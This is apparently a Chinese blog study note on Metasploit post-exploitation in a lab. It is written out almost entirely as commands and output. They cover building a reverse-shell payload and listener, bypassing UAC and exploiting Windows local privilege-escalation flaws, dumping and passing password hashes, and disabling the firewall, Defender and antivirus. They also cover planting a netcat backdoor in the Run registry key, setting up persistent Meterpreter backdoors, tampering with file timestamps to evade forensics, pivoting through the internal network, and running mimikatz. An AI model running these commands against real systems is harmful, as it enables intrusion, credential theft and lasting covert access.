msf后渗透部分学习

1.准备工作

• 已经获得目标系统控制权后扩大战果

  • 提权
  • 信息收集
  • 渗透内网
  • 永久后门

• 基于已有 session 扩大战果

  • msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -f exe -o payload.exe
    - kali 监听
    
      -
    msf > use exploit/multi/handler
    msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
    msf exploit(multi/handler) > set LHOST 10.0.0.128
    msf exploit(multi/handler) > exploit -j
    - windows 系统执行 payload.exe
    
    - kali 进入 metepreter
    msf exploit(multi/handler) > sessions 
    

Active sessions

Id Name Type Information Connection

---

1 meterpreter x86/windows WIN7-VM\John @ WIN7-VM 10.0.0.128:4444 -> 10.0.0.132:62941 (10.0.0.132)

msf exploit(multi/handler) > sessions

Active sessions

Id Name Type Information Connection

---

1 meterpreter x86/windows WIN7-VM\John @ WIN7-VM 10.0.0.128:4444 -> 10.0.0.132:62941 (10.0.0.132)

msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1…

meterpreter > getuid
Server username: WIN7-VM\John

#### 2.获取system账号权限

- 提权失败，一般是由于 UAC 限制

meterpreter > getuid
Server username: WIN7-VM\John
meterpreter > load priv
[-] The ‘priv’ extension has already been loaded.
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)

meterpreter > background

- 绕过 UAC 限制

  - use exploit/windows/local/ask

use exploit/windows/local/ask
set payload windows/meterpreter/reverse_tcp
use exploit/windows/local/ask
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.128
set FILENAME win_update.exe
set SESSION 1
exploit

![img](ai4HMWI.png)

![img](D:\blog\source\_posts\msf后渗透部分学习\MXYqrBh.png)

meterpreter > getsystem
meterpreter > getuid

![img](D:\blog\source\_posts\msf后渗透部分学习\uHed9pJ.png)

- use exploit/windows/local/bypassuac

use exploit/windows/local/bypassuac
set SESSION 1
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.128
show targets
exploit

![img](D:\blog\source\_posts\msf后渗透部分学习\eO3yUbv.png)

- use exploit/windows/local/bypassuac_injection

use exploit/windows/local/bypassuac_injection
set SESSION 1
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.128
exploit

![img](D:\blog\source\_posts\msf后渗透部分学习\VwGyhJD.png)

- 利用漏洞直接提权为 system

  - use exploit/windows/local/ms13_053_schlamperei

use exploit/windows/local/ms13_053_schlamperei
set SESSION 1

  ![img](https://i.imgur.com/VkGx24J.png)

  

- use exploit/windows/local/ms13_081_track_popup_menu

use exploit/windows/local/ms13_081_track_popup_menu
set SESSION 1
exploit

![img](D:\blog\source\_posts\msf后渗透部分学习\VkGx24J.png)



- use exploit/windows/local/ms13_097_ie_registry_symlink

use exploit/windows/local/ms13_097_ie_registry_symlink
set SESSION 1
set URIPATH /
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.128
set SRVHOST 10.0.0.128
exploit

- use exploit/windows/local/ppr_flatten_rec

use exploit/windows/local/ppr_flatten_rec
set SESSION 1
exploit

![img](https://i.imgur.com/Jhqu2n4.png)



- 图形化 payload

  - set payload windows/vncinject/reverse_tcp

use exploit/windows/local/ppr_flatten_rec
set payload windows/vncinject/reverse_tcp
set SESSION 1
set LHOST 10.0.0.128
set ViewOnly false
exploit
![img](https://i.imgur.com/wOXJo7u.png)

- 关闭 UAC 功能

  - 获取 hashdump

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
John:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

- 尝试利用

use exploit/windows/smb/psexec
set RHOST 10.0.0.132
set SMBUser John
set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.128
exploit

![img](https://i.imgur.com/vXDrNNx.png)

报错：Exploit failed [no-access]

- 需要提前关闭 UAC

sessions -i 2
shell
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
shutdown -r -t 0

![img](https://i.imgur.com/WJBykgA.png)

- 再次利用

use exploit/windows/smb/psexec
set RHOST 10.0.0.132
set SMBUser John
set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.0.128
exploit

#### 4.基础操作 

##### 关闭 防火墙

- 需要管理员或system权限

netsh advfirewall set allprofiles state on
netsh advfirewall set allprofiles state off

![img](https://i.imgur.com/VsB8p0A.png)

##### 关闭windefend

- 查看服务名称

![img](https://i.imgur.com/SITzUbY.png)

- 关闭防火墙

net stop windefend

##### bitlocker 加密

- manage-bde -off C:
- manage-bde -status C:

##### 关闭DEP

- bcdedit.exe /set {current} nx AlwaysOff

##### 杀死防病毒软件

- run killav
- run post/windows/manage/killav

##### 开启远程桌面服务

开启服务

run post/windows/manage/enable_rdp

![img](https://i.imgur.com/Dl02OVL.png)

关闭服务

run multi_console_command -rc root/.msf4/loot/20180418001805_default_10.0.0.132_host.windows.cle_842354.txt

开启服务

run getgui –e
run getgui -u yuanfh -p pass
run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20160824.1855.rc

##### 查看远程桌面

- screenshot
- use espia
  - screengrab

##### 使用tokens攻击域控制器

tokens, 用户每次登录，账号绑定临时的tokens,访问资源时提交 tokens 进行身份验证，类似于 web cookies。

- Incognito
  - 独立功能的软件，被 msf 集成在 metepreter 中
  - 无需密码或破解或获取密码 hash，窃取 tokens 将自己伪装成其他用户
  - 尤其适用于域环境下提权渗透多操作系统
- 搭建域环境
  - DC + XP
- load incognito
  - `list_tokens -u`
  - `impersonate_token lab\administrator`
- 运行以上命令需要 getsystem
  - 本地普通权限用户需要先本地权限
  - `use exploit/windows/local/ms10_015_kitrap0d`
  - `execute -f cmd.exe -i -t # -t：`使用当前假冒tokens执行程序
  - shell

##### 注册表

- 注册表保存着 windows 几乎全部配置参数
  - 如果修改不当，可直接造成系统崩溃
  - 修改前完整备份注册表
  - 某些注册表的修改是不可逆的
- 常见用途
  - 修改、增加启动项
  - 窃取存储于注册表中的机密信息
  - 绕过文件型病毒查杀
- 用注册表添加 nc 后门服务（metepreter）

meterpreter >

upload /usr/share/windows-binaries/nc.exe C:\windows\system32

reg enumkey -k HKLM\software\microsoft\windows\currentversion\run

reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d

‘C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe’

reg queryval -k HKLM\software\microsoft\windows\currentversion\Run -v nc

- 打开防火墙端口（metepreter）

meterpreter >
execute -f cmd -i -H
netsh firewall show opmode
netsh firewall add portopening TCP 4444 “test” ENABLE ALL
shutdown -r -f -t 0
nc 10.0.0.132 444

- 其他注册表项
  - https://support.accessdata.com/hc/en-us/articles/204448155-Registry-Quick-Find-Chart

##### 抓包

- 抓包（metepreter）

  -

load sniffer
sniffer_interfaces
sniffer_start 2
sniffer_dump 2 1.cap / sniffer_dump 2 1.cap
在内存中缓冲区块循环存储抓包（50000包），不写硬盘
智能过滤 metepreter 流量，传输全称使用 SSL/TLS 加密
- 解码

  - use auxiliary/sniffer/psnuffle
  - set PCAPFILE /root/1.cap

##### 搜索文件

- search -f *.ini
- search -d c:\documents\ and\ settings\administrator\desktop\ -f *.docx

##### 破解弱口令

- John the Ripper 破解弱口令

• use post/windows/gather/hashdump # system 权限的 metepreter
• run # 结果保存在 /tmp 目录下
• use auxiliary/analyze/jtr_crack_fast
• run

  ##### 擦除痕迹
  
  - 文件系统访问会留下痕迹。电子取证重点关注
  - 渗透测试和攻击者往往希望销毁文件系统访问痕迹
  - 最好的避免被电子取证发现的方法：不要碰文件系统
    - metepreter 的先天优势所在（完全基于内存）
  - MAC 时间 （Modified / Accessed / Changed）
    - ls -l –time=atime/mtime/ctime 1.txt
    - stat 1.txt
    - touch -d “2 days ago” 1.txt
    - touch -t 1501010101 1.txt
  - MACE：MFT entry
    - MFT：NTFS 文件系统的主文件分配表 Master File Table
    - 通常 1024 字节或2个硬盘扇区，其中存放多项 entry 信息
    - 包含文件大量信息（大小 名称 目录位置 磁盘位置 创建日期）
    - 更多信息可研究文件系统取证分析技术
  
  ##### pivoting 跳板 /枢纽/支点
  
  - msfvenom 制作 payload

  msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=kali_firewall LPORT=4444 -b “\x00\xff” -e x86/shikata_ga_nai -f exe -o payload.exe

  - 获取 system 权限
  
  ![img](https://i.imgur.com/PXgwA0S.png)
  
  - 利用已经控制的一台计算机作为入侵内网的跳板
  
  - 在其他内网计算机看来访问全部来自于跳板
  
  - run autoroute -s 1.1.1.0/24 # 不能访问外网的被攻击目标内网网段
  
  - 自动路由现实场景
  
    -

  利用 win7 攻击内网 XP（对比 xp 有无外网访问权的情况）
  – 扫描内网：use auxiliary/scanner/portscan/tcp

  - Pivoting 之端口转发 portfwd
  
    -

  利用已经被控计算机，在kali 与攻击目标之间实现端口转发
  portfwd add -L LIP -l LPORT -r RIP -p RPORT
  portfwd add -L 1.1.1.10 -l 445 -r 2.1.1.11 -p 3389
  portfwd list / delete / flush

  - use exploit/windows/smb/ms08_067_netapi

  set RHOST 127.0.0.1
  set LHOST 2.1.1.10

  - use exploit/multi/handler
  
    - set exitonsession false
  
  #### 持久后门
  
  - 利用漏洞取得的 metepreter 运行内存中，重启失效
  - 重复 exploit 漏洞可能造成服务崩溃
  - 持久后门保证漏洞修复后仍可远程控制
  
  - metepreter 后门

  run metsvc -A # 删除 -r
  use exploit/multi/handler
  set PAYLOAD windows/metsvc_bind_tcp
  set LPORT 31337
  set RHOST 1.1.1.1

  - 持久后门

  run persistence -h
  run persistence -X -i 10 -p 4444 -r 10.0.0.128
  run persistence -U -i 20 -p 4444 -r 10.0.0.128
  run persistence -S -i 20 -p 4444 -r 10.0.0.128

  ##### mimikatz
  
  - hashdump 使用的就是 mimikatz 的部分功能

  getsystem
  load mimikatz
  wdigest ��kerberos ��msv ��ssp ��tspkg ��livessp
  mimikatz_command -h
  mimikatz_command -f a::
  mimikatz_command -f samdump::hashes
  mimikatz_command -f handle::list
  mimikatz_command -f service::list
  mimikatz_command -f crypto::listProviders
  mimikatz_command -f winmine::infos # 扫雷游戏